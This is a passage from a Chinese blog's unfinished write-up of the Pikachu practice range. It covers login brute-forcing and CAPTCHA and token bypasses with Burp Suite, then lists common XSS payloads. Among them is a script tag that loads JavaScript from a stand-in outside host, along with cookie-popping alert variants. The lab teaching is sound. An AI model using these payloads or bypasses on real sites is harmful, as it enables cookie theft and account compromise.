<!DOCTYPE html><html lang="zh-CN"><head><!-- hexo injector head_begin start --><link href="https://cdn.jsdelivr.net/npm/hexo-widget-tree@0.0.5/css/index.css" rel="stylesheet"/><!-- hexo injector head_begin end --><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="theme-color" content="#00EE76"><meta name="author" content="Na0h_1e3"><meta name="copyright" content="Na0h_1e3"><meta name="generator" content="Hexo 5.3.0"><meta name="theme" content="hexo-theme-yun"><title>Pikachu靶场的小记(未完) | Na0h的神光棒存放地</title><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Noto+Serif+SC:wght@900&amp;display=swap" media="print" onload="this.media='all'"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/star-markdown-css@0.1.22/dist/yun/yun-markdown.min.css"><script src="//at.alicdn.com/t/font_1140697_ed8vp4atwoj.js" async></script><script src="https://cdn.jsdelivr.net/npm/scrollreveal/dist/scrollreveal.min.js" defer></script><script>document.addEventListener("DOMContentLoaded", () => {
  [".post-card",".post-content img"].forEach((target)=> {
    ScrollReveal().reveal(target);
  })
});
</script><link rel="shortcut icon" type="image/svg+xml" href="/favicon.ico"><link rel="mask-icon" href="/favicon.ico" color="#00EE76"><link rel="alternate icon" href="/yun.ico"><link rel="preload" href="/css/hexo-theme-yun.css" as="style"><link rel="preload" href="/js/utils.js" as="script"><link rel="preload" href="/js/hexo-theme-yun.js" as="script"><link rel="prefetch" href="/js/sidebar.js" as="script"><link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin><link rel="stylesheet" href="/css/hexo-theme-yun.css"><script id="yun-config">
    const Yun = window.Yun || {};
    window.CONFIG = {"hostname":"na0hblog.top","root":"/","title":["Na0h","的","神光棒存放地"],"version":"1.3.0","mode":"auto","copycode":true,"anonymous_image":"https://cdn.jsdelivr.net/gh/YunYouJun/cdn/img/avatar/none.jpg","say":{"api":"https://v1.hitokoto.cn","hitokoto":true},"fireworks":{"colors":["0, 255, 127","0, 238, 118","0, 139, 69"]}};
  </script><script>(function(){
  var bp = document.createElement('script');
  var curProtocol = window.location.protocol.split(':')[0];
  if (curProtocol === 'https') {
    bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
  }
  else {
    bp.src = 'http://push.zhanzhang.baidu.com/push.js';
  }
  var s = document.getElementsByTagName("script")[0];
  s.parentNode.insertBefore(bp, s);
})();</script><meta name="description" content="这是一篇Pikachu靶场的小记~随便打打啦">
<meta property="og:type" content="article">
<meta property="og:title" content="Pikachu靶场的小记(未完)">
<meta property="og:url" content="http://na0hblog.top/2021/01/16/Pikachu%E9%9D%B6%E5%9C%BA%E7%9A%84%E5%B0%8F%E8%AE%B0/index.html">
<meta property="og:site_name" content="Na0h的神光棒存放地">
<meta property="og:description" content="这是一篇Pikachu靶场的小记~随便打打啦">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021010310211748.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210103102122175.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210103102125649.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210103102515757.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210103102819599.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112101902269.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112102236304.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112102502142.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210112102605934.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="c:/Users/ls/AppData/Roaming/Typora/typora-user-images/image-20210112103021748.png">
<meta property="og:image" content="c:/Users/ls/AppData/Roaming/Typora/typora-user-images/image-20210112103155240.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210115213323848.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210115213320894.png">
<meta property="og:image" content="file:///C:/Users/ls/AppData/Roaming/Tencent/Users/1163435945/QQ/WinTemp/RichOle/QQ%60S44GWODPWC%7D%7DY4BLQ3PR.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116095520755.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116100050772.png">
<meta property="og:image" content="c:/Users/ls/AppData/Roaming/Typora/typora-user-images/image-20210116100138507.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116103121112.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/2021011610340540.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116110202797.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116110202811.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116111530388.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116111530419.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116112422694.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116112529208.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116113249913.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116113702391.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116113702424.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20210116114002179.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70">
<meta property="article:published_time" content="2021-01-16T03:40:17.000Z">
<meta property="article:modified_time" content="2021-01-16T03:41:11.681Z">
<meta property="article:author" content="Na0h_1e3">
<meta property="article:tag" content="web">
<meta property="article:tag" content="sql注入">
<meta property="article:tag" content="xss">
<meta property="article:tag" content="暴力破解">
<meta property="article:tag" content="文件上传">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/2021010310211748.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70"><script src="/js/ui/mode.js"></script></head><body><script defer src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script defer src="/js/ui/fireworks.js"></script><canvas class="fireworks"></canvas><div class="container"><a class="sidebar-toggle hty-icon-button" id="menu-btn"><div class="hamburger hamburger--spin" type="button"><span class="hamburger-box"><span class="hamburger-inner"></span></span></div></a><div class="sidebar-toggle sidebar-overlay"></div><aside class="sidebar"><script src="/js/sidebar.js"></script><ul class="sidebar-nav"><li class="sidebar-nav-item sidebar-nav-toc hty-icon-button sidebar-nav-active" data-target="post-toc-wrap" title="文章目录"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-list-ordered"></use></svg></li><li class="sidebar-nav-item sidebar-nav-overview hty-icon-button" data-target="site-overview-wrap" title="站点概览"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-passport-line"></use></svg></li></ul><div class="sidebar-panel" id="site-overview-wrap"><div class="site-info fix-top"><a class="site-author-avatar" href="/about/" title="Na0h_1e3"><img width="96" loading="lazy" src="/images/agif.gif" alt="Na0h_1e3"><span class="site-author-status" title="浮舟沧海">💯</span></a><div class="site-author-name"><a href="/about/">Na0h_1e3</a></div><a class="site-name" href="/about/site.html">Na0h的神光棒存放地</a><sub class="site-subtitle">一点诚心，万缘俱息</sub><div class="site-desciption"></div></div><nav class="site-state"><a class="site-state-item hty-icon-button icon-home" href="/" title="首页"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-home-4-line"></use></svg></span></a><div class="site-state-item"><a href="/archives/" title="归档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-archive-line"></use></svg></span><span class="site-state-item-count">3</span></a></div><div class="site-state-item"><a href="/categories/" title="分类"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-2-line"></use></svg></span><span class="site-state-item-count">4</span></a></div><div class="site-state-item"><a href="/tags/" title="标签"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="site-state-item-count">6</span></a></div><a class="site-state-item hty-icon-button" target="_blank" rel="noopener" href="https://yun.yunyoujun.cn" title="主题文档"><span class="site-state-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-settings-line"></use></svg></span></a></nav><hr style="margin-bottom:0.5rem"><div class="links-of-author"><a class="links-of-author-item hty-icon-button" rel="noopener" href="tencent://message?uin=1163435945" title="QQ" target="_blank" style="color:#12B7F5"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-qq-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://github.com/seldomlee" title="GitHub" target="_blank" style="color:#6e5494"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-github-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://music.163.com/#/user/home?id=432232046" title="网易云音乐" target="_blank" style="color:#C20C0C"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-netease-cloud-music-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="https://space.bilibili.com/42264529" title="哔哩哔哩" target="_blank" style="color:#FF8EB3"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-bilibili-line"></use></svg></a><a class="links-of-author-item hty-icon-button" rel="noopener" href="1163435945@qq.com" title="E-Mail" target="_blank" style="color:#8E71C1"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-mail-line"></use></svg></a></div><hr style="margin:0.5rem 1rem"><div class="links"><a class="links-item hty-icon-button" href="/links/" title="我的小伙伴们" style="color:dodgerblue"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-genderless-line"></use></svg></a></div><br><a class="links-item hty-icon-button" id="toggle-mode-btn" href="javascript:;" title="Mode" style="color: #f1cb64"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-contrast-2-line"></use></svg></a></div><div class="sidebar-panel sidebar-panel-active" id="post-toc-wrap"><div class="post-toc"><div class="post-toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Pikachu%E9%9D%B6%E5%9C%BA%E7%9A%84%E5%B0%8F%E8%AE%B0"><span class="toc-number">1.</span> <span class="toc-text">Pikachu靶场的小记</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.1.</span> <span class="toc-text">暴力破解</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E8%A1%A8%E5%8D%95%E7%9A%84%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3"><span class="toc-number">1.1.0.1.</span> <span class="toc-text">基于表单的暴力破解</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E7%A0%81"><span class="toc-number">1.1.1.</span> <span class="toc-text">验证码</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87-on-server"><span class="toc-number">1.1.1.1.</span> <span class="toc-text">验证码绕过(on server)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E9%AA%8C%E8%AF%81%E7%A0%81%E7%BB%95%E8%BF%87-on-client"><span class="toc-number">1.1.1.2.</span> <span class="toc-text">验证码绕过(on client)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#token%E9%98%B2%E7%88%86%E7%A0%B4"><span class="toc-number">1.1.1.3.</span> <span class="toc-text">token防爆破</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%88%A9%E7%94%A8burpsuite%E9%80%92%E5%BD%92%E6%8A%93%E5%8F%96%E8%BF%94%E5%9B%9E%E5%8C%85"><span class="toc-number">1.1.1.3.1.</span> <span class="toc-text">利用burpsuite递归抓取返回包</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xss%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC-js%EF%BC%81%EF%BC%81%EF%BC%81"><span class="toc-number">1.2.</span> <span class="toc-text">xss跨站脚本(js！！！)</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84payload%EF%BC%9A"><span class="toc-number">1.2.0.1.</span> <span class="toc-text">常见的payload：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E6%BC%8F%E6%B4%9E%E7%9A%84%E6%8C%96%E6%8E%98"><span class="toc-number">1.2.0.2.</span> <span class="toc-text">XSS漏洞的挖掘</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss"><span class="toc-number">1.2.0.3.</span> <span class="toc-text">反射型xss</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss-get"><span class="toc-number">1.2.0.3.1.</span> <span class="toc-text">反射型xss(get)</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8F%8D%E5%B0%84%E5%9E%8Bxss-post"><span class="toc-number">1.2.0.3.2.</span> <span class="toc-text">反射型xss(post)</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%AD%98%E5%82%A8%E5%9E%8Bxss"><span class="toc-number">1.2.0.4.</span> <span class="toc-text">存储型xss</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#DOM%E5%9E%8Bxss"><span class="toc-number">1.2.0.5.</span> <span class="toc-text">DOM型xss</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#DOM%E5%9E%8Bxss-x"><span class="toc-number">1.2.0.6.</span> <span class="toc-text">DOM型xss-x</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#XSS%E7%9B%B2%E6%89%93"><span class="toc-number">1.2.0.7.</span> <span class="toc-text">XSS盲打</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#xss%E8%BF%87%E6%BB%A4"><span class="toc-number">1.2.0.8.</span> <span class="toc-text">xss过滤</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#xss%E8%BF%87%E6%BB%A4%E5%B8%B8%E8%A7%81bypass"><span class="toc-number">1.2.0.8.1.</span> <span class="toc-text">xss过滤常见bypass:</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#xss%E4%B9%8Bhtmlspecialchars"><span class="toc-number">1.2.0.9.</span> <span class="toc-text">xss之htmlspecialchars</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#xss%E4%B9%8Bhref%E8%BE%93%E5%87%BA"><span class="toc-number">1.2.0.10.</span> <span class="toc-text">xss之href输出</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#xss%E4%B9%8Bjs%E8%BE%93%E5%87%BA"><span class="toc-number">1.2.0.11.</span> <span class="toc-text">xss之js输出</span></a></li></ol></li></ol></li></ol></li></ol></div></div></div></aside><main class="sidebar-translate" id="content"><div id="post"><article class="post-block" itemscope itemtype="https://schema.org/Article"><link itemprop="mainEntityOfPage" href="http://na0hblog.top/2021/01/16/Pikachu%E9%9D%B6%E5%9C%BA%E7%9A%84%E5%B0%8F%E8%AE%B0/"><span hidden itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Na0h_1e3"><meta itemprop="description"></span><span hidden itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><meta itemprop="name" content="Na0h的神光棒存放地"></span><header class="post-header"><h1 class="post-title" itemprop="name headline">Pikachu靶场的小记(未完)<a class="post-edit-link" href="https://github.com/user-name/repo-name/tree/branch-name/subdirectory-name_posts/Pikachu靶场的小记.md" target="_blank" title="编辑" rel="noopener"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-edit-line"></use></svg></a></h1><div class="post-meta"><div class="post-time" style="display:block"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-calendar-line"></use></svg></span> <time title="创建时间：2021-01-16 11:40:17" itemprop="dateCreated datePublished" datetime="2021-01-16T11:40:17+08:00">2021-01-16</time></div><span class="post-count"><span class="post-symbolcount"><span class="post-meta-item-icon" title="本文字数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-file-word-line"></use></svg></span> <span title="本文字数">3.2k</span><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读时长"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-timer-line"></use></svg></span> <span title="阅读时长">12m</span></span></span><span class="post-busuanzi"><span class="post-meta-divider">-</span><span class="post-meta-item-icon" title="阅读次数"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-eye-line"></use></svg> <span id="busuanzi_value_page_pv"></span></span></span><div class="post-classify"><span class="post-category"> <span class="post-meta-item-icon" style="margin-right:3px;"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-folder-line"></use></svg></span><span itemprop="about" itemscope itemtype="https://schema.org/Thing"><a class="category" href="/categories/%E9%9D%B6%E5%9C%BA/" style="--text-color:var(--hty-text-color)" itemprop="url" rel="index"><span itemprop="text">靶场</span></a></span></span><span class="post-tag"><span class="post-meta-divider">-</span><a class="tag" href="/tags/web/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">web</span></a><a class="tag" href="/tags/sql%E6%B3%A8%E5%85%A5/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">sql注入</span></a><a class="tag" href="/tags/xss/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">xss</span></a><a class="tag" href="/tags/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">暴力破解</span></a><a class="tag" href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/" style="--text-color:var(--hty-text-color)"><span class="post-meta-item-icon"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-price-tag-3-line"></use></svg></span><span class="tag-name">文件上传</span></a></span></div><div class="post-author"><span class="author-name">Na0h_1e3</span></div></div></header><section class="post-body" itemprop="articleBody"><div class="post-content markdown-body" style="--smc-primary:#00EE76;"><a id="more"></a>

<h1 id="Pikachu靶场的小记"><a href="#Pikachu靶场的小记" class="headerlink" title="Pikachu靶场的小记"></a>Pikachu靶场的小记</h1><h2 id="暴力破解"><a href="#暴力破解" class="headerlink" title="暴力破解"></a>暴力破解</h2><ul>
<li><p>爆破关卡有四小关</p>
</li>
<li><p>暴力破解就像一道填入答案就能知道正确与否的选择题，四个答案逐个尝试直到正确为止<br>但暴力破解的选择题不会直接给出答案的内容和数量，这时就需要结合字典了</p>
</li>
<li><p>爆破其实很少能得出结果(对于那些遵循了认证安全策略的系统而言)</p>
</li>
<li><p>关于字典：</p>
<ol>
<li>通过网站得到管理员或者用户的各种信息生成字典进行爆破</li>
<li>网上一些汇总的字典</li>
</ol>
</li>
</ul>
<h4 id="基于表单的暴力破解"><a href="#基于表单的暴力破解" class="headerlink" title="基于表单的暴力破解"></a>基于表单的暴力破解</h4><p>很简单的登陆框<br>burpsuite抓一下包直接爆破即可</p>
<h3 id="验证码"><a href="#验证码" class="headerlink" title="验证码"></a>验证码</h3><p>接下来就涉及到验证码了<br>需要分析一下验证码的验证机制：</p>
<p>第二关在服务端检测验证码，利用burpsuite的repeat模块，先输入正确的验证码，再输入错误的验证码，再输入正确的验证码，三次发送send，若第三次于第一次结果相同则可能存在验证码的无条件不刷新<br>第三关输入错误的验证码，会弹出框框即前端js验证</p>
<h4 id="验证码绕过-on-server"><a href="#验证码绕过-on-server" class="headerlink" title="验证码绕过(on server)"></a>验证码绕过(on server)</h4><p>这里是在服务端进行检测，但此处的验证码可以重复使用即无条件不刷新</p>
<ul>
<li>无条件不刷新：某一时间段内，不刷新页面就可以无限次数的使用同一验证码，无论登陆成功与否 </li>
<li>bypass: 还是burpsuite抓包，将验证码作为常量即可</li>
</ul>
<h4 id="验证码绕过-on-client"><a href="#验证码绕过-on-client" class="headerlink" title="验证码绕过(on client)"></a>验证码绕过(on client)</h4><ul>
<li>此处的验证码在前端进行检测</li>
<li>bypass: 仍然是burpsuite抓包，直接将传送验证码的参数变量去掉即可</li>
</ul>
<h4 id="token防爆破"><a href="#token防爆破" class="headerlink" title="token防爆破"></a>token防爆破</h4><ul>
<li><p>抓包发现提交的变量中多了一个token变量，再对返回包分析，可以确认token数值由返回包确定<br>因此每次登陆都要将上一个返回包的token值放入其中</p>
</li>
<li><p>利用burpsuite的intruder的草叉模式(pitchfork)：不同位置对应不同的字典<br>密码爆破仍选择字典，token需要抓取上一个返回包：</p>
</li>
</ul>
<h5 id="利用burpsuite递归抓取返回包"><a href="#利用burpsuite递归抓取返回包" class="headerlink" title="利用burpsuite递归抓取返回包"></a>利用burpsuite递归抓取返回包</h5><ul>
<li>在选项中修改线程数为1(因为每次都要抓取上一个返回包的token)</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/2021010310211748.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<ul>
<li>点击Add</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20210103102122175.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<ul>
<li>Refetch response得到返回包，搜索token然后选中即可</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20210103102125649.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<ul>
<li>选择递归模式：</li>
</ul>
<p><img src="https://img-blog.csdnimg.cn/20210103102515757.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<p>Redirections(重定向)选择always,就可以开始爆破啦</p>
<p><img src="https://img-blog.csdnimg.cn/20210103102819599.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTUwODMyMw==,size_16,color_FFFFFF,t_70" alt="在这里插入图片描述" loading="lazy"></p>
<h2 id="xss跨站脚本-js！！！"><a href="#xss跨站脚本-js！！！" class="headerlink" title="xss跨站脚本(js！！！)"></a>xss跨站脚本(js！！！)</h2><p>恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击！</p>
<p>存储型XSS：存储型XSS，持久化，代码是存储在服务器中的，如在个人信息或发表文章等地方，插入代码，如果没有过滤或过滤不严，那么这些代码将储存到服务器中，用户访问该页面的时候触发代码执行。这种XSS比较危险，容易造成蠕虫，盗窃cookie</p>
<p>反射型XSS：非持久化，需要欺骗用户自己去点击链接才能触发XSS代码（服务器中没有这样的页面和内容），一般容易出现在搜索页面</p>
<p>DOM型XSS：不经过后端，DOM-XSS漏洞是基于文档对象模型(Document Objeet Model,DOM)的一种漏洞，DOM-XSS是通过url传入参数去控制触发的，其实也属于反射型XSS。 </p>
<h4 id="常见的payload："><a href="#常见的payload：" class="headerlink" title="常见的payload："></a>常见的payload：</h4><p>转自</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;标签：可以引用外部的JavaScript代码，也可以将代码插入脚本标记</span><br><span class="line">&lt;script src&#x3D;http:&#x2F;&#x2F;xxx.com&#x2F;xss.js&gt;&lt;&#x2F;script&gt;  #引用外部的xss</span><br><span class="line">&lt;script&gt; alert(&quot;hack&quot;)&lt;&#x2F;script&gt;   #弹出hack</span><br><span class="line">&lt;script&gt;alert(document.cookie)&lt;&#x2F;script&gt; #弹出cookie</span><br></pre></td></tr></table></figure>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;img&gt;标签：</span><br><span class="line">&lt;img  src&#x3D;1  onerror&#x3D;alert(&quot;hack&quot;)&gt;</span><br><span class="line">&lt;img  src&#x3D;1  onerror&#x3D;alert(&#x2F;hack&#x2F;)&gt;</span><br><span class="line">&lt;img  src&#x3D;1  onerror&#x3D;alert(document.cookie)&gt;  #弹出cookie</span><br><span class="line">&lt;img  src&#x3D;1  onerror&#x3D;alert(123)&gt;      注：对于数字，可以不用引号</span><br><span class="line">&lt;img  src&#x3D;&quot;javascript:alert(&quot;XSS&quot;);&quot;&gt;</span><br><span class="line">&lt;img  dynsrc&#x3D;&quot;javascript:alert(&#39;XSS&#39;)&quot;&gt;</span><br><span class="line">&lt;img  lowsrc&#x3D;&quot;javascript:alert(&#39;XSS&#39;)&quot;&gt;</span><br></pre></td></tr></table></figure>
